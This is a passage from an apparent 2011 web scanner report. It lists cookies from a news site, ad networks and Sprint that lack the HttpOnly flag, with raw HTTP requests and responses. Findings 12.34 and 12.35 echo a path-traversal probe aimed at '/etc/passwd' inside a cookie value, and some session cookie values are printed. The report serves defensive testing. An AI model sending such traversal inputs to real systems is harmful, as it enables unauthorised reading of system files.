User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.24. http://www.publish2.com/newsgroups/state-worker.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.publish2.com
Path:	/newsgroups/state-worker.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

kohanasession=9gnfjllrd20ndevbqqm9m4mf11; path=/
kohanasession_data=Ka5AoyopZ9kpPFa3NhsbtDXPQTEx847bVIDScsm%2BCw155MwWO5%2Bi1aulbRfAmlul4YY88KLOwbADcRPw1U9RCBn5XPQv66E5mPqC7zOCFxXtgBZa9sFWq8XJkjY%2FR0dkJTs95fKqzHW8QzisCKQqHkLPklaUEyXplD%2B9oZMRWehF%2Br2fr80fCEKujMyNVeT02rrVyIGwkFXYWdsFh5hNBxdP0EUrS4ZnmgRzr%2FTPEwIVbgkBbsogjdVLV1%2BSA9%2FBF%2B10olZ65IaRCy7Tu0MlJzQ7idWcpZoUMye0g%2BHxUC0P81tshB2%2F8%2F4Nxq7yZpQOuGG85Qlr0qyRoiwUB%2BPWn%2BeRycpTrDTNC4wqlWnTrMRWvi3HKMg%3D; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=9gnfjllrd20ndevbqqm9m4mf11; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=Ka5AoyopZ9kpPFa3NhsbtDXPQTEx847bVIDScsm%2BCw155MwWO5%2Bi1aulbRfAmlul4YY88KLOwbADcRPw1U9RCBn5XPQv66E5mPqC7zOCFxXtgBZa9sFWq8XJkjY%2FR0dkJTs95fKqzHW8QzisCKQqHkLPklaUEyXplD%2B9oZMRWehF%2Br2fr80fCEKujMyNVeT02rrVyIGwkFXYWdsFh5hNBxdP0EUrS4ZnmgRzr%2FTPEwIVbgkBbsogjdVLV1%2BSA9%2FBF%2B10olZ65IaRCy7Tu0MlJzQ7idWcpZoUMye0g%2BHxUC0P81tshB2%2F8%2F4Nxq7yZpQOuGG85Qlr0qyRoiwUB%2BPWn%2BeRycpTrDTNC4wqlWnTrMRWvi3HKMg%3D; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12562

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336
...[SNIP]...

12.25. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s=1,2*4e62cac9*7ILJjOd50C*xAn6CqfjViVWUXPcP2NGnpPxnQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.26. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.27. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bh="b!!!!V!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!$=3GDG!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^"; path=/; expires=Tue, 03-Sep-2013 00:47:35 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?id=1166786&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!U!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^"

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!V!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!$=3GDG!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^"; path=/; expires=Tue, 03-Sep-2013 00:47:35 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:47:35 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

12.28. http://adadvisor.net/adscores/g.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/adscores/g.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ab=0001%3AR2FJHgNFRQ4Qt9W2tXVkxDaOpLVexjtt; Domain=.adadvisor.net; Expires=Sun, 04 Sep 2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscores/g.js?sid=9201023828 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:08 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 21
Content-Type: application/javascript
Set-Cookie: ab=0001%3AR2FJHgNFRQ4Qt9W2tXVkxDaOpLVexjtt; Domain=.adadvisor.net; Expires=Sun, 04 Sep 2012 00:48:08 GMT; Path=/

document.write( '' );

12.29. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.30. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_QYQn="MLtXrt8vtl9rIAF9m8HM9CRwtSv8pwYgsssFOu5OTeOlKAZz5+/wuXtI5aPioHhhdEjAIagkY/G8GHOoPBTZKbe4LvfbnbdkKhONXmKkgHQgdLckCXP0Ycf6bL86yMYbL1uMiqL/s6MNej7gFcLrWQkAx8c6IYdi+yDQifN3Qycz6Jj1em6Y5Eay9ZRgmRVQd4wL1CPn/dRQ4JoZ5iAZWwFtgtxpYZ2eGJoLULxN8vLRSvbSAvOi3Mra/1wX6oTWmDs4ThHYmdgsHYPtkd1lfMJC8ZS8jNp4O4oZuhx+vDf6G8BYd19mNkCBOkzH6Y5GDSLMLc63IB0="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJT+nPwIU1E3iQP/BkuMwYFC/diQV0mvz1kXs5llWevPI1xyt5IqzZ0HDpONBtYN5cOLq0Y0MDID8b06p+8YfclUA4HvE3pDVHOKpUDklOCk54RC6OSRkNnczdlHDXHWQC6K2swSQQ8vVN2F0i59OQ6jp4qiSUEONuY85ZLA1Z2OyLU7/10FZsW1qEmbSN89x1MtT5/YXPu6DPZWarOszUzHMAM6vuE+ScvdcP+yZdGgOlHPP/W1ItoFBhTdC6A1Odb9j1OcflxsGDAS+oJUNSD9BzBZwRhj081y7EhoDAlJhbCbdrv1IH+PUUcSGeWWa22CRI45O5ghe229XFch3R1pn6IVPDoJ0f2o2u6pC5soNdicK1r6OIJtTUJYNMJ4Aokj2+wkCi6Dq0alCMv+y91oSzdzJML8XwFhOstZBVOK/yZnmnfQ8mrl2zxNd4jrDQdB3J8hekQlKbwyg04s/a+Xgg6dTRJxRGxiQzc14wcItC4fC6wLc1No6sCqhw3U73G0sjkmOFoTzvKDWN/3nGjFh+adnq0HcLMjR+YKLjDY0tNuQMWEuFltUlAgfqrTRFHxgP/Fn38NCegLSnmgcUO8uIjl9mnNIBv0OpuMGKyGSX7f87985TmujaEs7n4Xy3a8QwtAnyqvCVqWpaHblOUXKl/U05rcz/at/8Kjpeuta5HGv1ZFOr7VvUY+fz9KlfFudANzZAm9Lcnecfk7HsAOBfj/bdkFmEFQ/TOgsExdf2KuIMzN7undJHKkdiOaTnklC9BA1XtwilEI3jTiWQFnsJhae+MXm28ZbizmAiaW7ESZH/CbfiHSOihUPQmrIEP0CEiOHkmwIIoboUPBGX66D1fSP1Oqj1qIKDU2VCS7592sVuMDhONvjwIUedzswvIQMf5g="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.31. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_yjA-="MLtXrl8utl9nIAH3UpyYS5hfBI/9QmnaLO8+oQBTcj1w7zk1SBcuEp11OYV3eoEYGjpFZWOPgoNQci70eKD5Ye/TluCH1ph2OfNJJMjXr2tEwK6lT90zRjTWFir3Smdxu7Pzv7IGaJb71qrC4tVI3Snv040D4KfKVeDwv36XXJk56KbIZB9bXWfOPmlpFy/NYxQNhmbXX7VX4OufOCJaGnRnjt7od3EgCE3JFz3vU3k7mw43bPeHKuGhKee7f4PwRlAXPU22nFtYN+Qzfjq1jqlV4IJnvHjWiSaeoFFH8sW+jqA85vTE9ESWiYb8WI1yKhshWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJUmnOAIY1E3idJy9v6s4JGVJ5ObQ+5teuL11ZXhNSsXZ156dYZ/zFzx7/QK2StGwrzmf3c8cmJlrbiousVEvoToDEFJ1YaJsDm6tTMw+CAf64AC6eY9EN7eZdhTC+Ck513ESp294zWo7X0k04/Z7TVzJyAZ/W3jznJIUEqdU1MvgEn3LxKvvcjO0hJ7zokiDJZC1kr7s8qFNMcCFyZMPGAQ21/szK332YYSpqr4wbbKgSf1iqx1DkHEuFxdbdIDuOLV/7HDr0NSI9lfUz1DeVzP0JmoTPtwzgb8RnYjUpP9j7MJuO/1BHimcP7e6eWWC22CTIo5O5ghe229XFc53R3p/6IVPDoJ0f2o2u6pe4sqNRk8f+ktcpgyfjzEvgM+MPva8Ei9Xo9xSqcZpt0yu9Z/iFCoapf4P2ym1XfY/7kJ6+WWK/OTKSYX5lvT0qD1gmoFUuVLwYl2vhq4jUI9wfESh7XeADVSQEPzaVQMVoBmPTFYHzyc6qCrbDTXvN37EmmLnSUn8n8LX6/nkfMoPz08xYhN15l7cEJAO7eWxfAqYCK5bypxxpTHvd+4cQYCnS8hpP9EFHp7nkU4TLIA7QK/PlvTtIyPuP9fr+OoLZRcVteNeKwbfnhmTiCo7n4X2JZMQxdDny4vMVaWpaHblOeXc8jUsd1A0fax/8Cjpuqt+xYazn2DsB1aqMrYPglKJmcXXOzMrNMqOAD6AkPkBINEu3pbtyG0TWrs76ByH904QwXmVXuhHtLigqnqLxpAOGpU61RvW300ARPPLydRznVLLo3zM6+jS3AbPjds3pX2bLumlDwKTASho04dsVjnTmgsFlZH91XIdGf4XMWshXYvVc4vm04tg0PjkA6w/91baJncnmZLxWvccwNe1Re1P4QUSf9U="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.32. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_sZLs="MLtXrl8utl9nIAH3UpzIJlAWnrFYGbJvOWDi153GQb2cZxqKMlwiAWoJ5Yu9t3o3RMAlOi1iudA1qvDChUqCLpGZorRdTiZLCmu4FMR9FpglQcv0Y1wqRDvlSp+dnJtWb4pctVLY2kxSXEJ6h1S7KFlnlFhQJIHSkSQTXVd1wA8DYdU/cG7AYCLy9/dLqfyLTnaeh3NmViaoJIybWwWmlkBFss+7oIy0C5/dZoP1eijxhsUGplHBN8ZOLDaEyRA+gCdTCOCL7EINN3DAxLHHSdt5dg/i/I7/F0rRXTyOJHnaBHf4RLX0Ihr8i1qNqEYac/8uPOw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJUmnOAIY1E3idJy9P5xdUThji6cmbl0yfrhTyjCHf+MXlD8u4Dpf0WbV2MEF4Ptn0dsRzdffVzzETU6of4++pRgG2lag8DAoBv+l8YX3XQilsoyx7SnlEa1UehCDSGPUAHRbRDKvVP/l/NBkphKHgqatoW/Es9C2bEYOGxQ6RvrAyMCPlU9k1r+UuUMGubwwSXadyFNsWz+pv9wP3+szYzHM/A6vuE9KM/dePOyZlGgOlHPM/Y1IroFxhTfC6Q0+caxpQOG3dMXFWOHaPUm0okqLCNdwRhj081y78hsDctJhbBbdjv0IH6XxpivjJzcqDOtU4RuYeNP1Pz4yoUBTyqC9oAgdx8pehpVaBQbthOnFXxGUF/yB7ikUu5ig61qgiVju/F6i1wpuqcbpdkyu4zpoZfan2fKXvSxwIPCd+mIom4eL/OTKSYUZ5vT2qDtgmoBcX1PIYlyvh6YjUI54PESg7XeADVSQUOxaVQMVoAeDTFYHzCYasCZb+1pRoCX2K+Vbfr83amcfki1jFlliD3wyx5nLpqeMw1sSkZwlsTlpKpI+hJ/sKTcBHI9v2liDRop3P1uZtc5BlUq2bSJ+pzj7kN/wrp0KJHRSqjzTf2hce3dr2DJVRcTEnEXV5husthlq2otZkyp3u1wjVrx0GbekwL2d+EQ1riWcQWpLYgE3QnvmYOUVrA8XdbCp4W+U2fAmiMd2YnNuAwle3NbdgdX8yQmLeU9l3kt7wJ17XlJ+6U4ImPBB/NejbV9+C/J6JU4GbesxHh31tI/cjoeeMt31mqERU+o1Balsy2vsGMMDZSAMm9gpSpVq6shvegudvENtBc/qTVoaw//HCrACTV2CI0m91tSZBai9tiNOvtzyNtrxKV63QHO2CtrOMHBzvh4bf14="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.33. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:48:11 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.34. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:52:26 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.35. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:06:36 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.36. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 00:56:36 GMT; Path=/
pb_rtb_ev="1:535461.2925993182975414771.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 00:56:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.37. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.casalemedia.com
Path:	/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:48:11 GMT
CMS=65131&1314825471&95308&1314825468&102679&1315097055;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT
CMST=TmLJ305iyssE;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:48:11 GMT
CMD1=AAFehU5iyssAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.38. http://ce.lijit.com/merge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ce.lijit.com
Path:	/merge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.39. http://cm.npc-mcclatchy.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 814

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

12.40. http://community.sprint.com/baw/community/buzzaboutwireless previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1=31342c323130313b31342c323130323b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /baw/community/buzzaboutwireless HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.sprint.com
